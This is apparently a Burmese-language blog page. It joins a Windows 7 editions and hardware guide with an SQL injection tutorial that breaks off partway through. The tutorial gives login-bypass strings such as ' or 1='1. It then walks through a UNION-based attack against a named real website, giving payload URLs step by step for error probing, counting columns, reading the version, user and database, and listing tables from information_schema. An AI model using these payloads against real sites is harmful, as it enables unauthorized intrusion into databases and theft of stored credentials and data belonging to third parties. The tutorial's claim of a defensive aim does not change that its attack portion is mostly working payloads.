Developer ေတြအတြက္ေတာ႔ သိပ္အသံုး၀င္မွာပါ။ Windows 7 Professional,
Enterprise, Ultimate versions ေတြမွာ IIS ပါ၀င္ပါတယ္။ )
Windows 7 Starter edition မွာ Physical Processor (CPU) တစ္လံုးပဲ တပ္လို႔ရပါတယ္။ core ကေတာ႔ unlimited ပါပဲ။ eg. Windows 7
version အားလံုးက dual core, quad core … ဘာ ကိုး … ညာကိုး … အားလံုး
support လုပ္ပါတယ္ …

Windows 7 Home Basic

Windows 7 Home Basic version ေတြကို Emerging Market ေတြလို႔ဆိုတဲ႔ ဖြံ.ၿဖိဳးစ ႏိုင္ငံေတြရဲ႕ ေစ်းကြက္မွာပဲေတြ႕ရေလ႔ ရွိပါတယ္။ ဒီ version မွာလဲ Aero user interface, DVDplayback, Windows Media Center, Internet connection sharingေတြမရႏိုင္ပါဘူး။Domain system ကိုလဲ Home Basicversion သံုးထားရင္ join ႏိုင္မွာမဟုတ္ပါဘူး။ Enterprise Featureေတြၿဖစ္တဲ႔ … Encryption File System (EFS), AppLocker, DirectAccess,BitLocker, Remote Desktop Host, BranchCache စတာေတြလဲမရႏိုင္ပါဘူး။ IISWeb Server ကိုလဲ သံုးလို႔ရမွာမဟုတ္ပါဘူး။Windows 7 Home Basic edition မွာPhysical Processor (CPU) တစ္လံုးပဲ တပ္လို႔ရပါတယ္။ 32bit version မွာmemory 4GB ထိ အမ်ားဆံုးသံုးႏိုင္ၿပီးေတာ႔ … 64bit version မွာ memory 8GBထိ အမ်ားဆံုးသံုးႏိုင္ပါတယ္....

Windows 7 Home Premium
Windows 7 Starter ကို လက္လီအေရာင္းတစ္ခ်ိဳ႕နဲ႔ ကြန္ၿပဴတာထုတ္လုပ္သူတစ္ခ်ိဳ႕က ကြန္ၿပဴတာအသစ္ထဲမွာ တစ္ခါတည္း ထည္႔ေပးလိုက္တဲ႔ အခါမ်ိဳးေတြမွာ ေတြ႕ရတတ္ပါတယ္။ (ၿမန္မာႏိုင္ငံမွာ computer ကို licensed windows နဲ႕ေရာင္းတဲ႔အခါ HomePremium version ေတြနဲ႔ပဲ ေရာင္းတာမ်ားပါတယ္)။
Windows 7 Starter & Home Basics ေတြနဲ႔ မတူတဲ႔အခ်က္က … Home Premiumedition မွာ .. Windows Aero UI, DVD playback, Windows Media Center,Internet connection sharing, IIS Webserver ေတြပါလာတာပါပဲ။ ဒါေပမဲ႔ Domainကိုေတာ႔ Join ႏိုင္မွာမဟုတ္ပါဘူး။ Enterprise Feature ေတြၿဖစ္တဲ႔Encryption File System (EFS), AppLocker, DirectAccess, BitLocker, RemoteDesktop Host, BranchCache စတာေတြလဲမရႏိုင္ပါဘူး။32bit version Windows 7 Home Premium က Memory 4GB ထိ အမ်ားဆံုး support လုပ္ပါတယ္။64bit version Windows 7 Home Premium က Memory 16GB ထိ အမ်ားဆံုး support လုပ္မွာၿဖစ္ပါတယ္။Windows 7 Home Premium က Physical Processors 2လံုးထိ support လုပ္ေပးႏိုင္ပါတယ္။

Windows 7 Professional
Windows 7 Professional version မွာ Home Premium version မွာရတဲ႔ Feature ေတြအကုန္ရႏိုင္ပါတယ္။ ဒါ႔အၿပင္ Domain system ကိုလဲ join ႏိုင္မွာၿဖစ္ပါတယ္။ EFS (Encryption File System), Remote Desktop Host စတာေတြလဲ ရပါတယ္။ သို႔ေသာ္ … EnterpriseFeature ေတြၿဖစ္တဲ႔ AppLocker, DirectAssess, BitLocker, BranchCacheစတာေတြ ေတာ႔ မရႏိုင္ပါဘူး။ Windows 7 Professional က Physical Processors 2လံုးထိ support လုပ္ေပးႏိုင္ပါတယ္။

Windows 7 Enterprise and Ultimate Editions

တကယ္တမ္းမွာေတာ႔ ေယဘံုယ်အားၿဖင္႔ … Windows 7 Enterprise Edition နဲ႔ Ultimate Edition ဟာအတူတူပါပဲ။ Windows 7 Ultimate Edition ကိုလက္လီအေရာင္းတစ္ခ်ိဳ႕နဲ႔ကြန္ၿပဴတာထုတ္လုပ္သူတစ္ခ်ိဳ႕က ကြန္ၿပဴတာအသစ္ထဲမွာ တစ္ခါတည္းထည္႔ေပးလိုက္တဲ႔အခါမ်ိဳးေတြမွာ ရရွိႏိုင္ပါတယ္။ Windows 7 Enterprise Edition ကိုေတာ႔Microsoft’s volume licensing customer ေတြအတြက္ပဲထုတ္ေပးပါတယ္။ Windows 7Enterprise & Ultimate Editions ေတြမွာ တၿခား Windows 7 Editionsေတြမွာရရွိႏိုင္တဲ႔ Feature ေတြတင္မကပါဘူး … Enterprise Feature ေတြၿဖစ္တဲ႔… Encryption File System (EFS), AppLocker, DirectAccess, BitLocker,Remote Desktop Host, BranchCache စတာေတြအၿပင္ Boot from VHDကိုပါရႏိုင္ပါတယ္။ Windows 7 Enterprise & Ultimate Editions ေတြဟာ Physical Processors 2လံုးထိ support လုပ္ေပးႏိုင္ပါတယ္။Note : MCTS ( Windows 7, 70-680 ) ေၿဖမဲ႔သူေတြအတြက္ … 70-680 မွာ test လုပ္တဲ႔feature အမ်ားစုဟာ Enterprise & Ultimate Editions ေတြက featuresေတြၿဖစ္ပါတယ္။


Windows 7 Hardware Requirements

ဒီမွာ Windows 7 တင္ရင္ အနိမ္႔ဆံုးလိုအပ္မဲ႔ Hardware Requirements ေတြကို ေရးသြားမွာပါ။ OperationSystem (OS) တစ္ခုဟာ သူ႔အတြက္အနိမ္႔ဆံုးလိုအပ္မဲ႔ Hardware Requirementsေတြၿပည္႔မွီမွသာ ေကာင္းေကာင္း Operate လုပ္မွာ ၿဖစ္ပါတယ္။ တစ္ခုသတိထားရမွာက …. အနိမ္႔ဆံုးလိုအပ္တဲ႔ Hardware Requirement ဆိုတာဟာ Windows အတြက္ သီးသန္႔လိုအပ္တာၿဖစ္ၿပီး သူ႔ေပၚမွာ Run မဲ႔ Application တစ္ခုခ်င္းစီဟာလဲ သူတို႔ရဲ႕ Memory နဲ႔ Storage လုိအပ္ခ်က္ေတြ ရွိေနေသးတယ္ဆိုတာပါပဲ။ ကိုယ္က စက္တစ္ခု၀ယ္ေတာ႔မယ္ဆိုရင္ (သို႔မဟုတ္) Windows Version တစ္ခုခုကို ကိုယ္႔စက္ထဲ ထည္႔ေတာ႔မယ္ဆိုရင္ ကုိယ္အသံုးၿပဳမဲ႔ Application ေတြအတြက္ပါ Hardware Requirement ကို စဥ္းစားဖို႔လိုမွာၿဖစ္ပါတယ္။


Hardware Requirements for Windows 7 Starter & Home Basic Editions

Windows 7 Starter & Home Basic Editions ေတြအတြက္ ေအာက္ပါ Hardware Requirements ေတြလိုအပ္မွာၿဖစ္ပါတယ္။
-
1GHz 32-bit (x86) or 64-bit (x64) Processor

- 512MB of System Memory
- 20GB (64-bit) or 16GB (32-bit) HDD
with at least 15 GB of free space (ဆုိလိုတာကေတာ႔ … 64-bit version ဆိုရင္ 20GB HDD ၿဖစ္ရမွာၿဖစ္ၿပီး၊ အဲဒီ HDD မွာ အနည္းဆံုး 15GB free space ရွိေနရမယ္လို႔ဆိုလိုတာပါ။)
-
32MB of Graphics Memory with DirectX9 support

တို႔ၿဖစ္ပါတယ္။


Hardware Requirements for Windows 7 Home Premium, Professional, Ultimate and Enterprise Editions

Windows 7 Home Premium, Professional, Ultimate and Enterprise Editions ေတြအတြက္ ေအာက္ပါ Hardware Requirements ေတြလိုအပ္မွာၿဖစ္ပါတယ္။
- 1GHz 32-bit (x86) or 64-bit (x64) Processor
- 1GB of System Memory
- 40GB of HDD with at least 15 GB of free space
- 128MB of Graphics Memory with DirectX9 support
တို႔ၿဖစ္ပါတယ္။


x86 & x64

Processor Architecture ေတြမွာ 32-bit version ကို (x86) လုိ႔ label တပ္ၿပီး 64-bit version ကို (x64) လို႔ label တပ္ၿပီးေဖာ္ၿပေလ႔ရွိပါတယ္။ Windows 7 က Processor Architectures ႏွစ္မ်ိဳးလံုးကို support လုပ္ပါတယ္။ Pentium IV နဲ႔ အေစာပိုင္း Processor ေတြဟာ x86 ေတြမ်ားပါတယ္။ ၿပီးေတာ႔ အသစ္ထြက္တဲ႔ Netbook ေသးေသးေလးေတြရဲ႕ Processor ေတြေရာေပါ႔။ x64 Processor သံုးတဲ႔စက္မွာ x64 version Windows 7 & x64 version Applications ေတြတင္ၿပီး Run ႏိုင္သလို၊ x86 versoin Windows 7 & x86 version Applications ေတြလဲ Run ႏိုင္ပါတယ္။ ( အရင္ကေတာ႔ x64 Processor သံုးတဲ႔စက္မွာ x64 version OS & Application ေတြပဲ Run ႏိုင္တယ္လို႔က်ေနာ္ထင္ခဲ႔တာ။ OS နဲ႔ Application ေတြရွားႏိုင္လို႔ x64 Processor သံုးထားတဲ႔စက္ေတြ မသံုးသင္႔ဘူးလို႔ထင္ခဲ႔တာ။ ခုမွ မွားမွန္းသိတယ္ … )


x86 Processor & OS

X86 version Windows 7 ေတြဟာ Memory (RAM) အၿမင္႔ဆံုး 4GB ထိပဲ support လုပ္ေပးႏိုင္မွာၿဖစ္ပါတယ္။ Windows 7 x86 version ကို x64 Processor သံုးတဲ႔စက္မွာတင္လို႔ရပါတယ္။ သို႔ေသာ္ OS ကေတာ႔ Memory 4GB ထိပဲ အမ်ားဆံုးသိမွာၿဖစ္ပါတယ္။ (အဲထက္ပိုေနလဲ သူမသိပါဘူး။ 4GB ထိပဲ support လုပ္ေပးႏိုင္မွာၿဖစ္ပါတယ္။)


x64 Processor & OS

x64 version Windows 7 ကုိေတာ႔ x64 Processor သံုးထားတဲ႔ စက္မွာပဲတင္လို႔ရမွာပါ။ x64 version Windows 7 Professional, Enterprise, Ultimate Edition ေတြမွာ System Memory (RAM) 128GB (တစ္ရာႏွစ္ဆယ္႔ရွစ္) ထိ support လုပ္ပါတယ္။ x64 version Windows 7 Home Basic က 8GB ထိ support လုပ္ပါတယ္။ x64 version Windows 7 Home Premium ကေတာ႔ 16GB ထိ support လုပ္ပါတယ္။


Shrink

Windows XP နဲ႔အေရွ႕က Windows ေတြမွာတုန္းက C:,D:, ေတြခြဲထားၿပီးလို႔ ကိုယ္ကလိုအပ္လို႔ ေနာက္ထပ္ခြဲခ်င္ေသးတယ္ ဆိုရင္ Norton Partition Magic လို Third Party Softwares ေတြသံုးၿပီး လုပ္ရပါတယ္။ Windows 7 မွာေတာ႔ အဲဒီ Feature တစ္ခါတည္းပါ၀င္လာပါတယ္။ အဲဒါကေတာ႔ Shrinkပါ။ My Computer --> Right Click --> Manage ကိုႏွိပ္ပါ။ Computer Management ေပၚလာရင္ Storage ေအာက္က Disk Management ကိုေရြးေပးပါ။ ၿပီးရင္ ကိုယ္ Partition ခြဲခ်င္တဲ႔ Volume ( C:, or , D: ) ကို Right Click ႏွိပ္ၿပီး Shrink Volume ကို ႏွိပ္လိုက္ၿပီး ဆက္လုပ္သြားရင္ partition ခြဲလို႔ရသြားပါၿပီ။

အျပည့္အစံု

SQL Injection သုိ႔မဟုတ္ Hacker ေတြရဲ႕ တုိက္ကြက္ဆန္း

မိတ္ဆက္
Injection နဲ႔ပက္သက္တဲ႔အပုိင္းကုိ အေတြ႔အၾကံဳ မရင့္က်က္ေသးတဲ႔သူေတြ၊ အေတြ႔အၾကံဳရွိၿပီးတဲ႔သူေတြပါ နားလည္ႏုိင္ေအာင္ ကၽြန္ေတာ့္ရဲ႕ အၿမင္နဲ႔ နဲနဲေလာက္ Tutorial တစ္ခုအၿဖင့္ေရးသားလုိက္ပါတယ္။ SQL injectiong နဲ႔ပက္သက္တဲ႔ Tutorial ေတြကုိ Google မွာ ရွာၾကည့္လုိက္ပါက ေတာင္လုိပုံေနပါတယ္။ အားလုံးကေတာ့ အတူတူပါပဲ... SQL injector ေတြၿဖစ္ေစရန္တစ္ခုအတြက္မဟုတ္ပဲ SQL Injection နဲ႔အတူ php နဲ႔ mysql functions ေလးေတြကုိ သိကာ security ပုိင္းကုိ ထိန္းသိန္းကာကြယ္ႏုိင္ရန္အတြက္ ရည္ရြယ္၍ Computer ေ၀ါဟာရကုိ ၿမန္မာလုိ တုိက္ရုိက္ဘာသာၿပန္ရတာ နဲနဲေတာ့ နားရႈပ္သြားႏုိင္မယ္။ ဒါေပမဲ႔ အတတ္ႏုိင္ဆုံးေတာ့ နားလည္ေအာင္ ရွင္းၿပေပးလုိက္ပါတယ္။ SQL Injection ကုိေလ့လာတဲ႔အခါမွာ အေၿခခံ Web Developement ပုိင္းအေၿခခံရွိဖု႔ိေတာ့လိုပါလိမ့္မယ္.. ဒီ tutorial အတြက္ လုိအပ္တာကေတာ့ php နဲ႔ sql အေၾကာင္းသိထားရင္ နားလည္ေလာက္ပါတယ္။
---DATABASE ဆိုတာဘာလဲ?---
ရုိးရုိးရွင္းရွင္းပါပဲ... Database ဆုိတာဘာလဲဆုိရင္ Database ဆုိတာ အခ်က္အလက္ Data ေတြစုစည္းသိမ္းဆည္းထားတဲ႔ Application တစ္ခုပါပဲ... Application Programming Interface (API) ေတြကုိ တည္ေဆာက္ အသုံးၿပဳမယ္ ထိန္းသိမ္း သိမ္းဆည္းထားမယ္။ Database(DB) servers ေတြဟာ Web development လုပ္ငန္းေတြ နဲ႔လည္း ေပါင္းစည္းအသုံးၿပဳလုိ႔ရတဲ႔အတြက္ ၄င္းအထဲက data ေတြကုိ ထုတ္ယူအသုံးၿပဳ၊ ၾကည့္ရႈ႕ဖုိ႔ဆုိတာ ခက္ခဲ႔တဲ႔ကိစၥတစ္ခုေတာ့မဟုတ္ပါဘူး။ Database အထဲမွာ usernames, passwords စသည္ ေတြလုိ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိလည္း သိမ္းဆည္းႏုိင္တာ ၿဖစ္တဲ႔အတြက္ Database ရဲ႕ လုံၿခံဳေရးဟာလည္း အလြန္ကုိအေရးၾကီးပါတယ္။ ထိန္းသိမ္းမႈ ညံ့ဖ်င္းတဲ႔ database တစ္နည္းအားၿဖင့္ အမွတ္တမဲ႔ၿဖစ္ေစ၊ သတိမမႈ၍ေသာ္လည္းေကာင္း၊ အေၾကာင္းေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင့္ programmer ေတြေရးသားထားတဲ႔ code ေတြရဲ႕ လြဲမွားမႈေတြ ေၾကာင့္ ဒီလုိဟာကြက္ေတြ ၿဖစ္ေပၚကာ database ထဲကုိ အၿခား တရားမ၀င္ ၀င္ေရာက္သူတုိ႔အား လမ္းဖြင့္ေပးသလုိၿဖစ္သြားတတ္ပါတယ္။ DB servers ေတြအမ်ားၾကီးရွိတဲ႔အထဲမွာ ဒါေလးေတြက အသုံးမ်ားတာေလးေတြပါ။
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open source),
SQLite စသည္ေပါ႔...
Database ရဲ႕ တည္ေဆာက္ပုံေလးကုိ ၿမင္ႏုိင္ေအာင္လုိ႔ ဇယားေလးနဲ႔ၿပထားတာပါ။
--- SQL INJECTION ဆုိသည္မွာ?---
SQL injection ဆုိတာကေတာ့ ယေန႔ေခတ္ အင္တာနက္စာမ်က္ႏွာေပၚမွာ အၿဖစ္အမ်ားဆုံး web application အမွားၿဖစ္ပါတယ္။ ၄င္း web application အမွားတစ္ခုမွေန၍ တရားမ၀င္ ၀င္ေရာက္အသုံးၿပဳသူေတြ (Hackers) က မိမိတုိ႔ရဲ႕ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိ ခုိးယူသြားႏုိင္ပါတယ္။ ဒါေၾကာင့္ SQL injection ဆုိတာ web or db server တုိ႔ရဲ႕ အမွားေၾကာင့္မဟုတ္ပဲ အေတြ႔အၾကံဳမ့ဲ၊ အေရအခ်င္း ည့ံဖ်င္းတဲ႔ programming ေရးဆြဲသူေတြေၾကာင့္သာၿဖစ္ပါတယ္။ ဒီနည္းလမ္းက အေ၀းတစ္ေနရာကေန application, web server ကုိ အလြယ္ ကူဆုံးထိန္းခ်ဳပ္ႏုိင္ပါတယ္။ ဒီ SQL injection မွာ ပုံစံအမ်ဳိးမ်ဳိးေသာ SQL commands ေတြ နဲ႔ web page ကေန အမ်ဳိးမ်ဳိးေသာ data ေတြကို ထုတ္ယူႏုိင္ပါတယ္။

ဥပမာတစ္ခုအေနနဲ႔ေၿပာမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔က Company တစ္ခုရဲ႕ Network တစ္ခုကုိ၀င္ေရာက္ေတာ့မယ္ဆုိရင္ port scanner ေတြနဲ႔ sanner ဖတ္ၿပီး အမွားေတြနဲ႕ ပြင့္ဟေနတဲ႔ port ကေန ၀င္ေရာက္သြားႏုိင္ပါတယ္။ ဒါေပမဲ႔လည္း အင္တာနက္နဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ Web Server (Host Sever) တစ္ခုက port 80 ေလာက္ပဲဖြင့္မယ္၊ တစ္ၿခား security ပုိင္းေတြ ေပးထားမယ္ဆုိရင္ port scanner ဘယ္ေလာက္ေကာင္းေကာင္း အလုပ္ၿဖစ္မွာမဟုတ္ပါဘူး၊ ၀င္ေရာက္ဖုိ႔ခက္သြားပါလိမ့္မယ္( ခက္ခဲေနမယ္ )... ဒါဆုိရင္ Web Hacking ကုိ ဦးတည္ၿပီးေၿပာင္းၾကည့္ရပါလိမ့္မယ္... Web Hacking လုိ႔ေၿပာရင္ ေတာ္ေတာ္မ်ားမ်ားကေတာ့ SQL Injection ကုိပထမဦးစြာေၿပးၿမင္ၾကမွာပါပဲ... ဟုတ္တယ္ေလ.. SQL Injection ကတစ္ၿခားဘာမွမလုိဘူး Web Browser တစ္ခုပဲလုိတယ္...

---ေရွာင္ကြင္း ၀င္ေရာက္ၿခင္း---
Site ေတြမွာ username, password ေတြနဲ႔ login ၀င္ခုိင္းတယ္ဆုိတာ site အထဲမွာ ရွိတဲ႔ content ေတြကုိ မွတ္ပုံတင္ထားတဲ႔သူ (username & password ရွိထားတဲ႔သူ) ေတြကုိသာ ၾကည့္ရႈအသုံးၿပဳခြင့္ေပးထားတာပါ။ အကယ္၍ မိတ္ေဆြက username & password မရွိပဲ ရွိသကဲ႔သုိ႔ ၀င္ေရာက္အသုံးၿပဳမယ္ (user registration မလုပ္ပဲ ၀င္ေရာက္တယ္) ဆုိရင္ ဒါကုိ BYPASSING LOGINS လုပ္တယ္လုိ႔ေခၚပါတယ္။ ဒါကေတာ့ programmer ရဲ႕ login မွာစီစစ္မႈ မေသခ်ာလုိ႔ ၿဖစ္တဲ႔အတြက္ ကံေကာင္းေထာက္မစြာနဲ႔ User name နဲ႔ Password ကုိမသိပဲ login ၀င္လုိ႔ရသြားပါလိမ့္မယ္။

ဥပမာတစ္ခုအေနနဲ႔ ၾကည့္မယ္ဆုိရင္ username က admin ၿဖစ္ၿပီး password က 12345 ဆုိၾကပါစုိ႔... ဒါဆိုရင္ SQL query က
SELECT USER from database WHERE username='admin' AND password='12345' ဆုိၿပီးၿဖစ္သြားပါလိမ့္မယ္..... အကယ္၍ အေပၚ SELECT command တန္ဖုိးက မွန္တယ္ဆုိရင္ site ထဲကုိ ၀င္ခြင့္ၿပဳမွာၿဖစ္ပါတယ္။ အကယ္၍ အထက္ပါေၿပာခဲ႔သလုိ programmer က login မွာမွန္ကန္တဲ႔စီစစ္မႈမရွိရင္ Hacker ေတြက ေအာက္ပါအတုိင္း ၀င္ေရာက္သြားႏုိင္ပါတယ္။

username:a or 1=1--
password:blank

SQL query မွာေတာ့

SELECT USER from database WHERE username='a' or 1=1-- AND password=''

ဒါက comment operator ပါ အဲ႔လုိပဲ အၿခား comment operator က /* ၿဖစ္ပါတယ္။

SELECT USER from database WHERE username='a' or 1=1

1=1 က အၿမဲတန္း query ကုိ true ၿဖစ္ေစၿပီး OR ကေတာ့ query တစ္ခုက true ၿဖစ္တဲ႔အတြက္ အၿခားတစ္ခုကုိလည္း true ၿဖစ္သြားေစပါတယ္ဒါေၾကာင့္ 'a' ဆုိတဲ႔ user ဟာ DB မွာမရွိေတာင္မွ ဒီ query က true ၿဖစ္ကာ site admin ကို၀င္ေရာက္ခြင့္ေပးသြားပါလိမ့္မယ္... ဒီလုိနည္းနဲ႔ Vulnerable ၿဖစ္တဲ႔ site ေတြအတြက္ ေအာက္ပါအတုိင္း စမ္းစစ္ႏုိင္ပါေသးတယ္...

username:' or 1='1 password:' or 1='1
username:' or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1
--- လ်ဳိ႕၀ွက္ထားေသာ Data မ်ားကုိ ၀င္ေရာက္အသုံးၿပဳၿခင္း---
SQL injection က အခုလုိ bypassing logins တစ္ခုတည္းမဟုတ္ပဲ DB servers ကေန လ်ဳိ႕၀ွက္စြာသိမ္းဆည္းထားတဲ႔ Data ေတြကုိ ရယူႏုိင္ပါတယ္... အနည္းငယ္ရႈပ္ေထြးေနမွာၿဖစ္တဲ႔အတြက္ နဲနဲေလး အထူးဂရုၿပဳၿပီးေတာ့ ေလ့လာၾကည့္ပါ။ ေအာက္ပုိင္းမွာ လက္ေတြ႔စမ္းလုိ႔ရေအာ္ site link နဲ႔ တကြ ေဖာ္ၿပေပးထားပါတယ္။

---အားနည္းခ်က္ အမွားမ်ား ရွာေဖြစစ္ေဆးၿခင္း---
Site တစ္ခုကုိရွာလုိက္မယ္...
In PHP ==>>
www.site.com/article.php?id=5

id variable assign လုပ္ထားတဲ႔ ေနာက္နားက ' (apostrophe) ေလးတစ္ခုကုိ ထည့္လုိက္ပါမယ္..

www.site.com/article.php?id=5'
ဒီလုိလုိ စမ္းတဲ႔ေနရာမွာ
Integer Based

www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
www.site.com/script.php?param=%
www.site.com/script.php?param=36'a

String Based

www.site.com/script.php?param=Text'--
www.site.com/script.php?param=Te'+'xt
www.site.com/script.php?param=Tex%
ဆုိၿပီးရွိပါတယ္.. အဆင္ေၿပသလုိ စမ္းသပ္ႏုိင္ပါတယ္...

အကယ္၍ ၄င္းရဲ႕ site က vulnerable မၿဖစ္ဘူးဆုိရင္ ပုံမွန္အတုိင္း page loading လုပ္သြားပါလိမ့္မယ္..
အဲ႔လုိမဟုတ္ပဲ query string filtering မရွိဘူးဆုိရင္ "MySQL Syntax Error By '5'' In Article.php on line 15." သုိမဟုတ္ Check the correct MySQL version သုိ႔မဟုတ္ MySQL Fetch error သုိ႔မဟုတ္ပါက ဘာမွမေပၚပဲ page အၿဖဴၾကီးသာေပၚေနပါလိမ့္မယ္... ဒါဆုိရင္ ဒီ site က vulnerable ၿဖစ္ေနပါတယ္ အကယ္၍ ' ၿဖင့္ မရလွ်င္ ေအာက္ပါအတုိင္း union select 1-- ဆုိတာကုိသုံးႏုိင္ပါတယ္။

www.site.com/article.php?id=5 union select 1--

In ASP ==>>
အထက္ပါနည္းအတုိင္း
http://www.site.com/index.asp?id=5
ဆုိရင္ ေနာက္က ' (apostrophe) ေလးထည့္ၿပီးစမ္းႏုိင္ပါတယ္။
http://www.site.com/index.asp?id=5'
ဒါဆုိရင္

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

ဆုိတဲ႔ error မ်ဳိးေပၚေနတတ္ၿပီး ASP, JSP, CGI, နဲ႔ PHP web pages ေတြမွာ စမ္းသပ္ႏုိင္ပါတယ္။

အကယ္၍ URL မွာ မေပၚတဲ႔ parameters မ်ဳိးဆုိရင္ ၄င္းတုိ႔ရဲ႕ login page, search page, feedback လုိေနရာမ်ဳိးေတြက ရွာႏုိင္ပါတယ္.. တစ္ခ်ဳိ႕ html page ေတြက POST command နဲ႔ ASP page ကုိ ပုိ႔ေဆာင္ေပးတဲ႔ parameters သုံးထားတတ္ပါတယ္.. ဒါဆုိရင္ေတာ့ ၄င္းတုိ႔ရဲ႕ HTML source code ထဲကုိ ၀င္ေရာက္ပါ။ ၿပီးရင္ "FORM" tag ကုိရွာလုိက္ပါ ... ဥပမာ
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

ဒီ <FORM></FORM> ႏွစ္ခုၾကားက ၿဖစ္ႏုိင္ေၿခေတြပါ။

<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value='a' or 1=1--">
</FORM>

value မွာ အေပၚကအတုိင္း BYPASSING LOGINS မွာသုံးသလုိ စမ္းသပ္ၿပီးရွာေဖြႏုိင္ပါတယ္။

---Columns အေရအတြက္ရွာေဖြၿခင္း---
‘order by’ ကုိအသုံးၿပဳၿပီး Columns မ်ားကုိ ရွာေဖြမွာၿဖစ္ပါတယ္..
URL query ကုိေအာက္ပါတုိင္း ရုိက္ထည့္လုိက္ပါမယ္... '/*' သုိ႔မဟုတ္ '--" ဆုိတာေလးသုံးလုိ႔ရပါတယ္..

www.site.com/article.php?id=5 order by 1/*
အမွားမေပၚဘူးဆုိရင္ ေနာက္တစ္ခါ 2 ဆုိၿပီးတုိးကာ ရုိက္ထည့္ပါမယ္

www.site.com/article.php?id=5 order by 2/*
ယခုအခ်ိန္အထိ အမွားမေပၚေသးဘူးဆုိရင္ ေနာက္တစ္ ထပ္ၿပီးတုိးပါမယ္.. ဒီလုိတုိးတုိးၿပီး အမွားေပၚလာတဲ႔အထိ ရွာေဖြရမွာၿဖစ္ပါတယ္...

www.site.com/article.php?id=5 order by 3/*

အခု 3 ကုိေရာက္တဲ႔အခါ အမွားေတြ႔တယ္ဆုိရင္
ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns ႏွစ္ခုရွိတယ္ဆုိတာ သိသြားပါၿပီ... ဒီလုိနည္းနဲ႔ Column ေတြကုိ တစ္ဆင့္ၿခင္းရွာေဖြရပါတယ္...

ေနာက္တစ္ခု ပုံနဲ႔ တကြ ရွာေဖြၾကည့္ရေအာင္

http://sbisa.org/circle.php?id=26 ကုိၾကည့္မယ္..
 
http://sbisa.org/circle.php?id=26 ရဲ႕ value ေနာက္မွာ ' ဆုိတဲ႔ (apostrophe) တစ္ခုထည့္လုိက္ပါမယ္..
 
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sbisaor/public_html/circle.php on line 10 ဆုိတဲ႔ error တစ္ခုေတြ႔ပါလိမ့္မယ္..

ဒါဆုိရင္ေသခ်ာတယ္.. SQL error တစ္ခုတက္ေနၿပီ... တိတိက်က်ေၿပာရရင္ DB Server က MySQL
OK, ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns အေရအတြက္ရွာမယ္...

http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒီအထိအဆင့္အဆင့္ရွာတယ္... error မၿဖစ္ေသးဘူး
 
7 အထိေရာက္တဲ႔အခါမွာေတာ့ error ေတြ႔တယ္ဆုိရင္ ဒါဟာ 6 Columns ရွိတယ္...
 --
ဒါဆုိရင္ေနာက္ထပ္ UNION SELECT ALL ဆုိတဲ႔ statement တစ္ခုကုိသုံးမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆုိၿပီးရုိက္ထည့္လုိက္မယ္..
---
ဒါဆုိရင္ 2,3,4 ဆုိတာၿပမယ္.. ဒီအပုိင္းေတြက data ေတြသိမ္းဆည္းထားတဲ႔ Columns ေတြၿဖစ္တယ္...

---MySQL version ရွာၿခင္း---
ဒီ Injection မွာ MySQL Version ကုိ checking လုပ္ဖုိ႔လုိပါတယ္... . Version အား Checking လုပ္ရန္ @@version သုိ႔မဟုတ္ version() functions ေတြကုိသုံးေပးရပါမယ္..
အခု @@version ကုိ data ေတြသိမ္းဆည္းထားတဲ႔ column မွာထည့္ၿပီး MySQL version ကုိစစ္မယ္..

http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--
 ---
သုိ႔မဟုတ္

http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--

ကုိသုံးႏုိင္ပါတယ္.. တခါတစ္ေလမွာ အထက္ပါနည္းအတုိင္းက error ေတြၿဖစ္တတ္တဲ႔အတြက္ unhex(hex()) ကုိသုံးေပးရပါမယ္..

http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--

ဒါဆုိရင္ Server မွာ အသုံးၿပဳေနတဲ႔ MySQL ရဲ႕ version ကုိေဖာ္ၿပေပးသြားပါလိမ့္မယ္...
အကယ္၍ user တုိ႔ ၊ database တုိ႔ကုိ check ခ်င္တယ္ဆုိရင္ ေအာက္ပါတုိင္း checking လုပ္ႏုိင္ပါတယ္..

www.site.com/article.php?id=5 UNION ALL SELECT user(),2/*
www.site.com/article.php?id=5 UNION ALL SELECT database(),2/*

ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--
----
---MySQL 5 ႏွင့္အထက္ injection---
အခုကၽြန္ေတာ္တုိ႔ ရတာ MySQL version 5.0.90 ၿဖစ္ပါတယ္... MySQL version 5 မွာ information_schema ဆုိတဲ႔ အသုံး၀င္တဲ႔ funtion တစ္ခုပါ၀င္ၿပီး ၄င္းက လက္ရွိ DB server ရဲ႕ tables နဲ႔ columns ေတြကုိ ထိန္းသိမ္းထားတာၿဖစ္ပါတယ္...
Tables ေတြကုိရယူရန္ table_name from information_schema.tables ဆုိတာကုိသုံးသလုိ
Columns ေတြကုိရယူရန္ column_name from information_schema.columns ဆုိတာကုိသုံးရပါမယ္..
ေနာက္တစ္ခုကေတာ့ ဒီ site အေပၚမွာ ၿမင္ရေအာင္လုိ႔ group_concat(table_name) ကုိ Tables ေတြအတြက္နဲ႔
group_concat(column_name) ကုိ Columns ေတြအတြက္သုံးေပးရပါတယ္...

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
-----
